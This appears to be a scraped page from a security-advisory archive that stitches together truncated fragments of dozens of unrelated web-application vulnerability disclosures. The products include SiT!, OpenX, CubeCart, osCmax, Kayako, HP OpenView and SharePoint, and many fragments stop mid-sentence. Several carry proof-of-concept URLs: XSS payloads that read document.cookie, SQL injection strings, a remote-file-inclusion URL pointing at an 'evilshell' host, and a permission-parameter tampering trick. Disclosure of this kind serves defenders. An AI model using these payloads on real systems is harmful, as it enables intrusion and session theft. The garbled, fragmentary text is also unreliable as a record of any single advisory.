Next Page >>
parameter
2004.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
Multiple vulnerabilities have been discovered in OpenX, which can be
exploited by malicious people to conduct cross-site scripting,
cross-site request forgery, and file inclusion attacks and by
malicious users to conduct script insertion and SQL injection attacks.
1) Input passed to the "clientid" parameter in "www/admin/banner-
acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php",
"www/admin/advertiser-campaigns.php", "www/admin/campaign-
banners.php", and "www/admin/banner-activate.php" is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in N-13 News, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the GET "id" parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?id=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1. Sql Injection vulnerability in "account-inbox.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter "origmsg" is used in sql query
Preconditions:
1. attacker must be logged in as valid user
Test:
"CubeCart is a fully featured ecommerce shopping cart solution used by
over a million store owners around the world."
The following web vulnerabilities were found in CubeCart version 4.3.3;
1.SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.
2.Cross-site Scripting vulnerability in
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.
3.Cross-site Scripting vulnerability in
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.
4.Cross-site Scripting vulnerability in
III. ANALYSIS
Summary:
A) XSS Vulnerabilities
graph.php (view_type parameter)
graph_view.php (filter parameter)
index.php/login (action parameter)
index.php/login (login_username parmeter)
B) Path Disclosure Vulnerabilities
graph.php (local_graph_id parameter)
| Remote File Inclusion: |
----------------------------
http://localhost/path_to_phpMychat/chat/users_popupL.php3
Parameter = From
POC = http://localhost/path_to_phpMychat/chat/users_popupL.php3?From=http://evilshell
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
###############################################################################
1. Local File Inclusion in "action.php"
###############################################################################
Reason: using unsanitized user submitted data for file operations
Attack vector: user submitted GET parameter "route"
Preconditions:
1. Windows platform
2. PHP version must be < 5.3.4 for null-byte attacks to work
Result: remote file disclosure, php remote code execution
[+] Introduction
Pandora FMS (for Pandora Flexible Monitoring System) is a software
solution for monitoring computer networks. It allows monitoring in a
visual way the status and performance of several parameters from
different operating systems, servers, applications and hardware systems
such as firewalls, proxies, databases, web servers or routers.
It can be deployed in almost any operating system. It features remote
monitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Efront, which can be exploited to perform sql injection and cross-site scripting attacks.
1) Input passed via the "course" GET parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?ctg=lesson_info&lessons_ID=1&course=%27%20onmouseover%3dalert%28document.cookie%29%3E
Gauci. As part of the review he reported the following vulnerabilities:
- SQL injection in adview.php and other delivery scripts because of
missing or improper validation of the "OAID" cookie;
- SQL injection in tjs.php because of missing or improper validation
of the "referer" GET parameter;
- XSS vulnerability in sso-accounts.php because of missing or improper
validation of the "email" GET parameter (2.4.x not affected)
- Possible arbitrary file deletion in tjs.php via the "trackerid" GET
parameter
- Possible CRLF injection in various delivery files because of missing
2.1.1. Exploit:
Check the exploit section.
2.2. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site info., such as admin email address.
2.2.1. Exploit:
Check the exploit section.
2.3. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site design. (Also, all the site settings can be changed by other parameters)
2.3.1. Exploit:
Check the exploit section.
2.4. Failure to Restrict URL Access [in "mailPage.asp"]. Everyone can mailbomb others.
2.4.1. Exploit:
Check the exploit section.
Example:
http://[server]/[installdir]/whoisonline.php?id=1'+and+"dsec"="dsecrg"+union+select+user(),version()/*
1.2 Attacker can inject SQL code in module main/mySpace/index.php vulnerable parameter tracking_list_coaches_column
--------------------------------------------------------------------------------------------
2. Stored XSS
Vulnerability found in script modules/news/submit.php in post parameter name "subject"
Example:
POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0
</body></html>
The object tag contains the classid of the ActiveX control. The
(optional) codebase attribute contains a link to the installation files
in case Download Manager is not yet installed on the user's system.
The URL parameter contains a link to the file that needs to be
downloaded.
The download is started using the StartDownload method of the ActiveX
control. When the download starts, the ActiveX control creates a
temporary configuration file after which it invokes a separate program
http://[host]/phpshop/admpanel/menu/adm_menu_new.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/gbook/?a=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Successful exploitation of this vulnerabilities requires that Apache's directive "AcceptPathInfo" is set to "on" or "default" (default value is "default")
2) Input passed via the "pid" GET parameter to /phpshop/admpanel/catalog/admin_cat_content.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/phpshop/admpanel/catalog/admin_cat_content.php?pid=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
---[ Vulnerability description ]
Positive Research Center has discovered multiple XSS vulnerabilties in Kayako Support Suite.
Application insufficiently verifies subscriberdata incoming parameter in /staff/index.php?_m=news&_a=importexport script.
An attacker with "staff" privileges can use the vulnerabilty to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
To use the vulnerability an attacker should convince a user with "staff" privileges to open URL like:
http://example.com/support/staff/index.php?_m=news&_a=managesubscribers&importsub=1&resultdata=YTo0OntzOjEzOiJzdWNjZXNzZW1haWxzIjtpOjA7czoxMjoiZmFpbGVkZW1haWxzIjtpOjE7czoxMToidG90YWxlbWFpbHMiO2k6MTtzOjk6ImVtYWlsbGlzdCI7czo5MDoiPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD5APHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4uPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4gIjt9
Application insufficiently verifies subject incoming parameter in /staff/index.php?_m=news&_a=insertnews script.
An attacker with "staff" privileges can use the vulnerabilty to inject and execute arbitrary HTML code and scripts in a user's browser within the trust relationship between the browser and the server.
Several buffer overflows have been found in HP OpenView Network Node
Manager, which can be exploited to remotely compromise a user's system.
While working on an exploit for the vulnerabilities disclosed in the
advisory [3], three bugs were found. The stack-based bug found on CGI
parameter 'OvOSLocale' is similar to one of the bugs previously reported
in [3] whereas the two heap-based bugs are different vulnerabilities.
Versions 7.51, 7.53, and 7.53 with patch NNM_01195 were tested and all
of them were vulnerable. The two heap-based buffer overflows are
different vulnerabilities from those exposed publicly on CVE-2008-0067
which can be exploited by malicious users to manipulate certain data,
conduct spoofing, SQL injection, and script insertion attacks and by
malicious people to conduct SQL injection and script insertion
attacks.
1) Input passed via the "login" parameter to index.php is not properly
sanitised before being used in an SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "login" and "password" parameters to index.php
is not properly sanitised before being displayed to the user. This can
Vulnerability Variant:
------------------
Injection "/home-f.asp","/opinions-f.asp" in "sitebid" parameter.
http://www.example.com/src=www.example.com/home-f.asp?sitebid=@@version
http://www.example.com/src=www.example.com/home-f.asp?sitebid=JyI%3D
http://www.example.com/src=www.example.com/home-f.asp?sitebid=%00
1.1 SQL injections in repository
Attacker need to be authorized in system for success.
Vulnerable script - repository_document.php
Vulnerable parameter - id_document
Example
*******
http://OSSIM-SERVER/ossim/repository/repository_document.php?id_document=-3
----------
While commenting XSS vulnerability in WordPress 3.0.1
(http://www.securityfocus.com/archive/1/513250), I mentioned additional
information concerning XSS vulnerability. These nuances concern and to
below-mentioned vulnerabilities. It's possible to attack as via parameter
checked[0], as via checked[1] and so on, and also via checked[]. In versions
WP 2.7 and higher it's possible to use parameter action=delete-selected, and
in versions 2.8 and higher it's also possible to use parameter
action2=delete-selected.
###############################################################################
1. Unauthorized password reset in "manager/passwordreset.php"
###############################################################################
Reason: directly accessible php script
Attack vectors: user submitted POST parameters "ID" and "Password"
Preconditions: none
Impact: attacker can take over CruxCMS admin account
Php script "manager/passwordreset.php" is directly accessible via web
without any authorization. Source code snippet:
Type of vulnerability: Cross-Site Scripting (XSS) - Reflected
Exploit Vectors: Local and Remote
Vulnerability Description: The Web application management interface of Server Monitor contains multiple injection points, which allow for execution of Cross-site Scripting (XSS) attacks. Arbitrary client side code such as JavaScript can be included into certain parameters throughout the Web application. The following parameters and Web pages have been tested and verified; however, it is likely more views and parameters within the application are vulnerable:
event-history.asp (siteid, type) parameter
admin-history.asp (siteid, type) parameters
dashboard-view.asp (siteid, id) parameters
device-events.asp (siteid, dn) parameters
Details
*******
Using the discovered vulnerabilities, an attacker can intercept the cookie and perform any administrative actions in the system on its behalf.
1. cross-site scripting vulnerability found in script aa-add-analytic2.jsp
Vulnerable GET parameter "backURL"
2 cross-site scripting vulnerability found in script aa-add-validate.jsp
Vulnerable GET parameter "pagePos"
3 cross-site scripting vulnerability found in script aa-analytic-frameset.jsp.jsp
Vulnerable GET parameter "entry"
4 cross-site scripting vulnerability found in script aa-cacheparams.jsp
I. Overview
=========
An Insecure Redirect vulnerability has been identified in Microsoft
SharePoint shared infrastructure. This vulnerability allows an attacker
to craft links that contain redirects to malicious sites in the source
parameter used throughout SharePoint portal.
The exploitation technique detailed in this document bypasses the cross
application redirection restriction which normally limits such redirects
restricting access to external sites.
Affected URL:
http://serverIP/omnidocs/doccab/doclist.jsp?DocListFolderId=927964&FolderType=G&FolderRights=010000000&FolderName=1234&FolderOwner=test&FolderLocation=G&Fold
erAccessType=I&ParentFolderIndex=100&FolderPathFlag=Y&Fetch=5&VolIndex=1&VolIndex=1
Vulnerable Parameter:
FolderRights
Exploit
Omnidocs application does not validate 'FolderRights' parameter. This parameter could be modified to '111111111' to get full access including rights to add
documents, add folders, delete folders and place orders.
stored XSS:
- all Input-Fields of the phonebook
reflected XSS:
- /websoftphone/jsp/CBCallBackCont.jsp, parameter list
- /websoftphone/jsp/PhoneBookCont.jsp, parameter udatab
- /websoftphone/jsp/CustoData.jsp, parameter openwin
- /websoftphone/jsp/RTCNavigator.jsp, parameter sessionid
- /websoftphone/servlet/DispLogon, parameter next
- /websoftphone/servlet/DispLogon, parameter main
Next Page>>
|
